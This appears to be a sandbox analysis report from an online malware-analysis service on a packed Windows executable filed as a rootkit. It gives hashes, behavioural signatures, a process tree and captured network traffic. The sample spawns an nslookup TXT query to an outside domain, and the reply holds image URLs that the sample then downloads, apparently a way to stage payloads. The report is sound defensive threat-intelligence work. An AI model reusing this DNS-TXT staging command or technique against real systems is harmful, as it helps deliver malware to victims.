Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Bootkits/5...1a.exe

windows7-x64

1

Bootkits/5...1a.exe

windows10-2004-x64

6

Bootkits/6...86.exe

windows7-x64

7

Bootkits/6...86.exe

windows10-2004-x64

7

Bootkits/8...f6.msi

windows7-x64

7

Bootkits/8...f6.msi

windows10-2004-x64

7

Bootkits/f...b1.exe

windows7-x64

7

Bootkits/f...b1.exe

windows10-2004-x64

Rootkits/0...c7.exe

windows7-x64

8

Rootkits/0...c7.exe

windows10-2004-x64

8

Rootkits/0...6d.exe

windows7-x64

10

Rootkits/0...6d.exe

windows10-2004-x64

1

Rootkits/0...ae.exe

windows7-x64

1

Rootkits/0...ae.exe

windows10-2004-x64

1

Rootkits/0...3e.exe

windows7-x64

7

Rootkits/0...3e.exe

windows10-2004-x64

10

Rootkits/0...10.exe

windows7-x64

7

Rootkits/0...10.exe

windows10-2004-x64

7

Rootkits/2...8e.dll

windows7-x64

1

Rootkits/2...8e.dll

windows10-2004-x64

1

Rootkits/2...a4.exe

windows7-x64

10

Rootkits/2...a4.exe

windows10-2004-x64

Rootkits/4...1b.exe

windows7-x64

7

Rootkits/4...1b.exe

windows10-2004-x64

7

Rootkits/6...d9.exe

windows7-x64

1

Rootkits/6...d9.exe

windows10-2004-x64

1

Rootkits/7...e8.exe

windows7-x64

7

Rootkits/7...e8.exe

windows10-2004-x64

7

Rootkits/8...22.exe

windows7-x64

1

Rootkits/8...22.exe

windows10-2004-x64

1

Rootkits/9...99.exe

windows7-x64

8

Rootkits/9...99.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    118s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    08/11/2023, 03:15 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Rootkits/757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe

  • Size

    9.5MB

  • MD5

    d76e73e0235f77c9bf5578eb51a9bf9a

  • SHA1

    23f26097829f9591164c509831b627964ffdecf9

  • SHA256

    757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8

  • SHA512

    a41f9f136fec5842aeeb3ad87ad6874a708c374bb6680ce7a5cbd4539e262e9096825c8246b0cc5c280358e2f51c5ed5fa67050b33b67bb3e2349db3fae6db18

  • SSDEEP

    196608:xOw0fyB+aXfyBb861vQowxMwCYRE3xSnZtAJzwCiHjx40TJnBGy4n6C:x+aX6eFo+ZJEBSnbASBHjx40TlE6C

Score
7/10
vmprotect

Malware Config

Signatures

  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
    "C:\Users\Admin\AppData\Local\Temp\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\SysWOW64\nslookup.exe
      nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
      2⤵
        PID:2916

    Network

    • flag-us
      DNS
      114.114.114.114.in-addr.arpa
      nslookup.exe
      Remote address:
      114.114.114.114:53
      Request
      114.114.114.114.in-addr.arpa
      IN PTR
      Response
      114.114.114.114.in-addr.arpa
      IN PTR
      public1114dnscom
    • flag-us
      DNS
      mxgmxbbyxb.bbyyjy.com
      nslookup.exe
      Remote address:
      114.114.114.114:53
      Request
      mxgmxbbyxb.bbyyjy.com
      IN TXT
      Response
      mxgmxbbyxb.bbyyjy.com
      IN TXT
      �20220718#20220710#1#http://pic.rmb.bdstatic.com/bjh/cbd93e817eb5cf12b2b6dacd13453d39.png#http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.png
    • flag-us
      DNS
      pic.rmb.bdstatic.com
      757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
      Remote address:
      8.8.8.8:53
      Request
      pic.rmb.bdstatic.com
      IN A
      Response
      pic.rmb.bdstatic.com
      IN CNAME
      pic.rmb.bdstatic.com.a.bdydns.com
      pic.rmb.bdstatic.com.a.bdydns.com
      IN CNAME
      opencdnpicrmb.jomodns.com
      opencdnpicrmb.jomodns.com
      IN CNAME
      opencdnpicrmb.gshifen.com
      opencdnpicrmb.gshifen.com
      IN A
      185.10.104.115
    • flag-de
      GET
      http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.png
      757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
      Remote address:
      185.10.104.115:80
      Request
      GET /bjh/e7cc2bdf04ec36188e6c6869c73b630f.png HTTP/1.1
      Host: pic.rmb.bdstatic.com
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Encoding: identity
      User-Agent: Mozilla/3.0 (compatible; Indy Library)
      Response
      HTTP/1.1 200 OK
      Server: JSP3/2.0.14
      Date: Wed, 08 Nov 2023 03:18:55 GMT
      Content-Type: image/png
      Content-Length: 514572
      Connection: keep-alive
      Expires: Wed, 18 Oct 2023 14:10:54 GMT
      Last-Modified: Mon, 11 Jul 2022 16:01:59 GMT
      ETag: "e7cc2bdf04ec36188e6c6869c73b630f"
      Age: 108007
      Accept-Ranges: bytes
      Content-MD5: 58wr3wTsNhiObGhpxztjDw==
      x-bce-content-crc32: 281991201
      x-bce-debug-id: Wk069zDA1+zaz2OWJ61WpSkcmQlQhQMfHiX41JLdp9ypeFJ7yhL8z0PLE97RayPdfk2fHgKldRDqqRdkIymWmA==
      x-bce-request-id: 6b46522b-1a55-405e-8b0f-1e580692ca03
      x-bce-restore-cache: -
      x-bce-restore-tier: -
      x-bce-storage-class: STANDARD
      Timing-Allow-Origin: *
      Ohc-Global-Saved-Time: Sun, 15 Oct 2023 14:10:54 GMT
      Ohc-Cache-HIT: fra01-sys-jomo2.fra01.baidu.com [4], zhuzuncache50 [4], wzix104 [2]
      Ohc-File-Size: 514572
      X-Cache-Status: HIT
    • 185.10.104.115:80
      http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.png
      http
      757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
      9.9kB
       531.1kB
       209
      393

      HTTP Request

      GET http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.png

      HTTP Response

      200
    • 114.114.114.114:53
      114.114.114.114.in-addr.arpa
      dns
      nslookup.exe
      74 B
       106 B
       1
      1

      DNS Request

      114.114.114.114.in-addr.arpa

    • 114.114.114.114:53
      mxgmxbbyxb.bbyyjy.com
      dns
      nslookup.exe
      67 B
       237 B
       1
      1

      DNS Request

      mxgmxbbyxb.bbyyjy.com

    • 8.8.8.8:53
      pic.rmb.bdstatic.com
      dns
      757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
      66 B
       198 B
       1
      1

      DNS Request

      pic.rmb.bdstatic.com

      DNS Response

      185.10.104.115

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2952-0-0x0000000000400000-0x000000000151E000-memory.dmp

      Filesize

      17.1MB

      Download

    • memory/2952-2-0x00000000001D0000-0x00000000001D1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2952-4-0x0000000000400000-0x000000000151E000-memory.dmp

      Filesize

      17.1MB

      Download

    • memory/2952-5-0x0000000000400000-0x000000000151E000-memory.dmp

      Filesize

      17.1MB

      Download

    • memory/2952-6-0x00000000001D0000-0x00000000001D1000-memory.dmp

      Filesize

      4KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.